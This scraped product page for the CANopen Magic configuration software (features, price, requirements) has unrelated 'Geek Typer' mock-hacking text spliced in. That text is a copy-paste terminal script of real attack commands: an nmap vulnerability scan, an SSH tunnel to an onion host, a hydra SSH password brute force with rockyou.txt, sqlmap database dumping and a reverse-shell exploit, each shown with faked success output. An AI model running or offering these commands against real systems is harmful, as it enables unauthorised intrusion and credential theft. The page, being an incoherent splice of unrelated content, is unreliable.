0

PEAK-System

Cactus Technologies

Geek Typer Terminal Access

No items found.
CANopen Magic is a software to configure, monitor, analyze, and simulate devices and networks that are based on CANopen and CANopen FD. CANopen Magic is available in the versions Lite, Professional, and Ultimate.
SKU
PKS/IPES-002098
€ 285.00 
€ 285.00 
5-6 weeks lead time
1-2 weeks lead time
1-2 weeks lead time
Buy now

Product features

All versions support:

  • Reading and writing objects using SDO transfers
  • Support of SDO modes Expedited, Segmented, and Blocked
  • Symbolic trace interpretation (node X, access to object Y)
  • Long-term trace recording
  • Support of CANopen FD

In addition, the Professional version offers:

  • Window for simplified PDO configuration
  • Graphical data display
  • Import of symbolic information from CANopen EDS files
  • Multiple symbolic trace windows® with individual filters
  • Support of complex application profiles like CiA® 447
  • Integrated LSS master module
  • Command line support

In addition, the Ultimate version offers:

  • Simulation of CANopen devices based on EDS files
  • Display of network diagram
  • Display of trace analysis diagram

Detailed information on this and other software products from Embedded Systems Academy can be found on the website www.canopenmagic.com. On request, we also sell other software products of Embedded Systems Academy.

Please note

Prices for single use and installation with computer-bound registration process via Internet. The software is delivered electronically.
Therefore, please enter the e-mail address of the intended recipient in the delivery address or in the comments when ordering.

Downloads

  • Windows® 11, 10, 8.1, 7, Vista, XP (32/64-Bit)
  • Mindestens 512 MB RAM und 1 GHz CPU
  • Internetanschluss
  • PC-CAN-Interface von PEAK-System

Geek Typer Terminal Access

$> sudo nmap -sS -A -O --script vuln 192.168.1.0/24 && ssh -D 8080 root@darkweb.onion -N &> ~/logs/scan.log

┌─────────────────────────────────────────────────────────┐ │ GEEK TYPER v2.3.7 || ROOT ACCESS MODE || SECURE │ ├─────────────────────────────────────────────────────────┤ │ > Initializing kernel modules... [ DONE ] │ │ > Spoofing MAC address... 0x7F:3A:2B:9D │ │ > Bypassing firewall ruleset... [ SUCCESS ] │ │ > Encrypting backchannel... AES-256-CBC │ │ > Tracing IP: 185.234.72.19... TOR EXIT NODE │ │ > Decrypting payload... *********** │ │ │ │ ACCESS GRANTED. WELCOME, USER. │ │ │ │ [ root@darkstar ~ ]$ _ │ └─────────────────────────────────────────────────────────┘ For a (copy-paste line by line): geek typer terminal

> ssh darknet@anonymous.hack > root@anonymous:~$ sudo su > Password: **************** > [sudo] authentication successful. > root@anonymous:~# nmap -sS -A 10.0.2.15 > Starting Nmap 7.80 ( https://nmap.org ) > Host is up (0.00034s latency). > PORT STATE SERVICE VERSION > 22/tcp open ssh OpenSSH 8.2p1 > 80/tcp open http Apache httpd 2.4.41 > 443/tcp open ssl/http nginx/1.18.0 > 8080/tcp open http-proxy > root@anonymous:~# hydra -l admin -P rockyou.txt ssh://10.0.2.15 > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "123456" > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "password" > [SUCCESS] login: admin pass: letmein > root@anonymous:~# sqlmap -u "http://target.site/page?id=1" --dbs > Parameter: id (GET) – vulnerable to UNION and boolean-based blind > available databases [3]: > [*] information_schema > [*] users_db > [*] corporate_data > root@anonymous:~# ./exploit --payload reverse_shell --lhost 192.168.1.47 > [!] Meterpreter session opened on port 4444 > [*] Sending shellcode... > [✓] Connection established. > root@anonymous:~# whoami > root > root@anonymous:~# echo "HACK THE PLANET" | lolcat > HACK THE PLANET > root@anonymous:~# exit > logout > Connection closed by remote host. > $ If you want a for quick copy-paste into a terminal-like chat: $> sudo nmap -sS -A -O --script vuln 192